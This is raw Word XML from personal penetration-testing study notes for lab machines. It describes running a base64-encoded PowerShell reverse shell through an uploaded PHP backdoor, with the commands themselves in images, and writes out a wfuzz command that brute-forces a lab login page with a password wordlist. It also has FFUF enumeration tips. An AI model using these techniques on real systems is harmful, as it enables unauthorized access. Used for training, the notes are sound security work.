        <w:t xml:space="preserve">section of the AD Pen Testing notes, we used the already Base64 encoded powershell rev shell from revshells.com</w:t>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t xml:space="preserve">From OSCP (9.3.1. Using Executable Files)</w:t>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t xml:space="preserve">Let's use a PowerShell one-liner for our reverse shell. Since there are several special characters in the reverse shell one-liner, we will encode the string with base64. We can use PowerShell or an online converter(https://www.base64encode.org/) to perform the encoding.</w:t>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t xml:space="preserve">In this demonstration, we'll use PowerShell on our Kali machine to encode the reverse shell one-liner. First, let's create the variable $Text, which will be used for storing the reverse shell one-liner as a string. Then, we can use the method convert and the property Unicode from the class Encoding to encode the contents of the $Text variable.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000110A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5257800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="329" name="image319.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image319.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId342"/>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t xml:space="preserve">As shown in Listing 33, the $EncodedText variable contains the encoded reverse shell one-liner. Let's use curl to execute the encoded one-liner via the uploaded simple-backdoor.pHP. We can add the base64 encoded string for the powershell command using the -enc parameter. We'll also need to use URL encoding for the spaces.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1600200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="199" name="image194.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image194.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34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t xml:space="preserve">After executing the command, we should receive an incoming reverse shell in the second terminal where Netcat is listening.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001111">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3187700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="146" name="image134.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image134.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34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t xml:space="preserve">Listing 35 shows that we received a reverse shell through the base64 encoded reverse shell one-liner. Great!</w:t>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iqbembl8m9br" w:id="141"/>
      <w:bookmarkEnd w:id="141"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute force login page using WFuzz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001119">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000111A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wfuzz -z file,/usr/share/wordlists/rockyou.txt -d "username=admin&amp;password=FUZZ" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--hw 17 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.165.195/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000111B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1260"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--hw 17</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" filters out pages with 17 words, to filter out false alarms. So change that number to whatever the false alarms are</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId345">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, and it was weird since the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main page</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page, and the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/login.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page all looked the same. But only the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./login.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page actually worked. So if you have multiple pages that all look the same, try brute forcing them all and one might work</w:t>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command explained:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001122">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="852"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-z file,/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001123">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="852"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> specifies the payload source.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001124">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="852"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file,/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: use the contents of this file (a wordlist) as payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001125">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="852"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means each line in rockyou.txt will be substituted into the FUZZ keyword.</w:t>
      </w:r>
    </w:p>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d "username=admin&amp;password=FUZZ"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001128">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="318"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s used to send a POST request with data (like a form).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001129">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="318"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> password=FUZZ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">means wfuzz will try each word from rockyou.txt as the password, keeping the username admin constant.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000112A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="318"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST-based </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">brute-force login attack.</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--hw 17</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000112D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells wfuzz to hide responses that have a response with exactly </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">17 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">words.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000112E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="757"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stands for "hide words"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000112F">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001130">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_96f5caykkl2" w:id="142"/>
      <w:bookmarkEnd w:id="142"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FFUF</w:t>
      </w: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t xml:space="preserve">Used for Web Fuzzing/Directory Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001136">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="368300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="476" name="image471.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image471.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId346"/>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1137">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="923"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FFUF does allow recursion but it's slow so just re-fun FFUF on specific folders if you find them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001138">
      <w:pPr>
        <w:rPr>
          <w:shd w:fill="ff9900" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001139">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000113A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000113B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">download the SecLists </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inside of /usr/share/wordlists/SecLists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000113C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo git clone https://github.com/danielmiessler/SecLists.git /usr/share/wordlists/SecLists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000113D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000113E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000113F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to find more files, add extensions! Some things like /admin.php won't show up if you don't add extensions, since enumerating /admin sometimes won't be configured to go to /admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001140">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, you have wil have to add extensions. In GoBuster, you do "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-x php,html,txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and in ffuf you do "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e .php,.js,.json,.html,.txt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41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't add extensions, then you risk the chance of not finding stuff. Don't add too many extensions though, or else it will make the search too long</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide on ffuf (it's good for both directory enumeration AND subdomain enumeration)</w:t>
      </w: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t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
